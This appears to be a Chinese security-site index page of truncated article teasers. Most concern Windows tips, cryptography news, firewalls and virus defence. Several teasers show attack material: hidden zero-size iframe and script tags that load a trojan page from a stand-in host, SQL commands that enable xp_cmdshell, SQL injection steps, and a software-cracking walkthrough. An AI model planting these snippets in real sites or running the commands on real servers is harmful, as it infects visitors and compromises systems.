现在专业性的网站越来越多，许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事，所以大家都想保护自己独创的作品，为自己的网页上把锁，今天就让我带大家了解一下如何给我们的网页加上一把密码锁。一、常用JavaScript密码锁1.了解javascriptJavaScript是一种新...

[阅读全文]

董师傅热线来接到了无数热情读者打来的技术咨询电话和来信提问，其中不乏五花八门各中软件和系统应用问题。要说到问什么的最多，董师傅可以肯定的说当然是XP。因为虽然Vista华丽地飘来了，很多朋友已经用上了这个新的系统，但也有大量的用户在坚守着XP的阵地。所以董师傅为这部分用户准备了一份大礼包——经典...

[阅读全文]

Windows系统是个等级森严的系统，它把用户分成了不同的等级，美其名曰“组”。每个组有不同的权限，不得进行越权的操作。在windows系统中Administrators组享有最高的特权，Guest组是Windows中的过客，其权限最低。介于这两者中间的是Users组，其只具有一些基本的权限。如...

[阅读全文]

在WindowsVista中，恰当地使用命令，有时候会远比鼠标操作更简单、有效。前几天介绍了出现在WindowsVista中的几个比较重要、常用的新命令，但显然不够详尽，相对于WindowsXP，Vista中还引入了其他的一些新的命令、快捷操作方式，在此做一详细列表，希望能帮助朋友们提高在WindowsVista中的操...

[阅读全文]

网页木马种植方案一直都存在很大的问题，当然欺骗需要技巧也需要时间，我们现在不需要那么麻烦的欺骗，本文就是教大家利用最新浏览器漏洞实现域名的欺骗......BDJ=2vzu<!l<[A>1+Cg1at　　前言7?)eT
cet　　域名欺骗有多种实现方法，本文所说的是利用客户端浏览器的漏洞来欺骗用户。sk
0~...

[阅读全文]

没有一款杀毒软件能解决所有的病毒问题，对未知病毒实施拦截技术不能做到100%准确。我们有没有可能尽量避免病毒的入侵呢?答案是肯定的。　　目录：　　1、病毒的识别　　1.1、病毒程序有别于正常程序的特征　　1.2楼：识破病毒程序的伪装　　2、病毒的防护　　2.1、最重要的防毒法宝——备份　　2.2...

[阅读全文]

平时我们在使用WindowsXP时，总要先进行登录。WindowsXP的登录验证机制比Windows98严格很多，理解并掌握WindowsXP的登录验证机制和原理对我们来说很重要，能增强对系统安全的认识，并能够有效预防、解决黑客和病毒的入侵。　　　　一、了解WindowsXP的几种登录类型　　1．交互式登录　　交互式登...

[阅读全文]

目前常见的木马有三种正向连接木马反弹连接木马收信木马　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口　　由于到现在，宽带上网(动态IP)和路由器的普遍，这个软件就有很大的不足　　动态IP：每次拨号，IP都会跟换.所以，就算对方...

[阅读全文]

一、操作系统的选择:　　我们经常听说黑客酷爱Linux系统，这是因为Linux相对Windows提供了更加灵活的操作方式，更加强大的功能。例如对于IP地址的伪造工作，利用Linux系统编写特殊的IP头信息可以轻松完成，然而在Windows系统下却几乎不可能做到。但是Linux也有它不足的一面，这个系统的命令庞杂、操作复...

[阅读全文]

来自新西兰的亚当布瓦洛宣布,他已经找出办法来解锁Windows的密码,但实现解密的前提条件是这台电脑上包含火线(IEEE1394)接口.　　它用一台Linux主机连接火线,只需要一次重启就可以骗过Windows验证,允许读写所有的存储器--这样就可以轻松突破Windows防线.　　该问题主要来源于火线的直接内存访问(D...

[阅读全文]

做密码学研究的人，都知道md5——曾经被认为是最安全的加密算法。其实任何一种加密算法都存在着这样或那样的漏洞，所以，还是尽量把自己的密码设计的足够长和足够复杂吧！】　　在2004年召开的国际密码学年会上，来自中国山东大学王小云教授的一篇关于"破译md5、haval－128、md4以及ripemd－128算法"的报告引起...

[阅读全文]

广泛使用开放邮件开放源码技术可以使黑客破获数码签名和获取邮件内容。问题在于如何通过gnu隐私卫士保护自己的电子邮件信息不被泄露。如果gpg(gpg是实现安全通讯和数据存储的一系列工具集，可以做加密数据和做数字签名之用)没有被正确使用，那么是不可能从信息中得到安全识别的。在数据加密前后插入额外的信息是完全可能的，误倒用户...

[阅读全文]

你也许现在还没有注意到，网络硬件和软件厂商最近已经开始广泛应用高级加密标准(AES)。这使那些网络管理员陷入了有趣的困境，特别是那些对虚拟专用网应用或者软件感兴趣的网络管理员。在本讲座中，我们将讨论你应该考虑的高级加密标准的一些问题，如果你正在考虑使用某些基于这个标准的产品的话。　　加密算法让人们担心的两个主要问题是安...

[阅读全文]

【软件名称】GIF动画转换王v1.0【破解工具】OD,PEID，W32Dasm【保护方式】NsPackV1.4->LiuXingPing*用OD载入它，然后按F8两次。在寄存器里面的ESP0012FFA0那里点右键，选择“在数据窗口跟踪”，然后在“数值”底下的第一行那里点一下，再右键，“断点—设置硬件访问断点—（字）W...

[阅读全文]

#Fromhttp://www.loveshell.net#剑心这个漏洞在国庆前就已经发现，后来国庆回来发现google改版了，这个漏洞就被google意外修复了，就没有发布漏洞细节，但是最近发现google再次改版就又改回来了，正好我上次提到htmlinjection（http://www.loveshell.net...

[阅读全文]

许多人或工具在监测分布式拒绝服务攻击时常犯的错误是只搜索那些DDoS工具的缺省特征字符串、缺省端口、缺省口令等。要建立网络入侵监测系统（NIDS）对这些工具的监测规则，人们必须着重观察分析DDoS网络通讯的普遍特征，不管是明显的，还是模糊的。　　DDoS工具产生的网络通讯信息有两种：控制信息通讯（在DDoS客户端与服务...

[阅读全文]

据统计，在所有黑客攻击事件中，SYN攻击是最常见又最容易被利用的一种攻击手法。相信很多人还记得2000年YAHOO网站遭受的攻击事例，当时黑客利用的就是简单而有效的SYN攻击，有些网络蠕虫病毒配合SYN攻击造成更大的破坏。本文介绍SYN攻击的基本原理、工具及检测方法，并全面探讨SYN攻击防范技术。据统计，在所有黑客攻击...

[阅读全文]

编辑前言：这个文章我没有测试，但前提条件还是很多，比如一定要有别的程序存在，而且也要用同一个SQLSERVER库，还得假设有注入漏洞。说到底和动网没有什么关系，但因为动网论坛的开放性，让人熟悉了其数据库结构，和程序运作方法。在一步步的攻击中取得管理权限，再一步步的提升权限，如果正好数据库用的是SA帐号，就更是麻烦了。正...

[阅读全文]

表名和字段名的获得适用情况:1)数据库是MSSQL2)连接数据库的只是普通用户3)不知道ASP源代码可以进行的攻击1)对数据内容进行添加，查看，更改实例:本文件以为列进行测试攻击。第一步:在输入用户名处输入单引号，显示MicrosoftOLEDBProviderforSQLServer错误80040e14字符串之前有未...

[阅读全文]

一、最简单的也是最有效的<iframesrc=http://www.xxx.com/muma.htmlwidth=0height=0></iframe>二、js挂马<scriptsrc=http://www.xxx.com/muma.js></script>三、js变形加密<SCRIPTlanguage="JScrip...

[阅读全文]

一、病毒杀不死的原因　　经常听人说，病毒软件报告杀死了某某病毒，可是重新启动后该病毒仍旧存在，无法杀死。病毒杀不死的原因主要有:　　1.病毒正在运行。由于Windows保护正在运行的程序，所以杀毒软件是无法杀死正在运行的病毒。即使是真的杀死了病毒，电脑正常关机时内存中活动的病毒还会再复制一个病毒到硬盘上。　　2.病毒隐...

[阅读全文]

p2p(peertopeer)蠕虫正在网络空间到处肆虐。当人们享受着p2p带来的便捷时，病毒也乘机将它作为一种全新的传播通道和生存空间。　　一年多来最大规模的电子邮件病毒storm在4月12日开始爆发，它通过垃圾邮件进行大量发送，这次攻击中还出现了新型的转变，垃圾邮件以提醒用户小心检测到的虚假病毒(例如，“trojan...

[阅读全文]

一:框架挂马<iframesrc=地址width=0height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframewidth='0'height='0'src='地址'></iframe>");保存为xxx.js，则JS挂马代码为<scriptlanguage=java...

[阅读全文]

注意：本文所讲述之设置方法与环境：适用于MicrosoftWindows2000Server/Win2003SERVER　IIS5.0/IIS6.01、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些？我们以海洋木马为列：＜objectrunat="server"id="ws"scope="pag...

[阅读全文]

1、登陆服务器，利用regedit命令打开注册表；2、找到如下分支：hklm\system\CurrentControlSet\Control\TerminalServer\Wds\Repwd\Tds\Tcp，在右侧的窗格中找到名为“PortNumber”的dword值，双击在弹出的对话框中点击“十进制”，会发现默认的...

[阅读全文]

Øsqlserver2005下开启xp_cmdshell的办法EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;ØSQL2005开启'OPENROWS...

[阅读全文]

一、防火墙技术发展概述传统的防火墙通常是基于访问控制列表(ACL)进行包过滤的，位于在内部专用网的入口处，所以也俗称"边界防火墙"。随着防火墙技术的发展，防火墙技术也得到了发展，出现了一些新的防火墙技术，如电路级网关技术、应用网关技术和动态包过滤技术，在实际运用中，这些技术差别非常大，有的工作在OSI参考模式的网络层，...

[阅读全文]

3.防火墙的系统管理发展趋势防火墙的系统管理也有一些发展趋势，主要体现在以下几个方面：（1）.首先是集中式管理，分布式和分层的安全结构是将来的趋势。集中式管理可以降低管理成本，并保证在大型网络中安全策略的一致性。快速响应和快速防御也要求采用集中式管理系统。目前这种分布式防火墙早已在Cisco（思科）、3Com等大的网络...

[阅读全文]

21.调制方式：模拟通信可采用调幅、调频、调相等多种调制方式，采用数字调制时，相应地称为幅移键控（ASK）、频移键控（FSK）、相移键控（PSK）；信号只有两种状态的ASK称为通断键控（OOK），当前的数字通信系统使用OOK-PCM格式，属于强度调制-直接检测（IM-DD）通信方式，是通信方式中最简单、最初级的方式。而...

[阅读全文]

7．6类系统适于什么样的应用？目前，还没有公布出来需要6类布线系统支持的应用。6类布线系统具有卓越的性能，对所有超5类或更低类别布线系统所支持的应用当然也会支持。IEEE（电气和电子工程师协会）正在开发一种新版的半双工千兆位以太网，它就需要6类布线系统。在我们编写FAQ时，该应用还没有得到认可，但可以从某些厂家那里获得...

[阅读全文]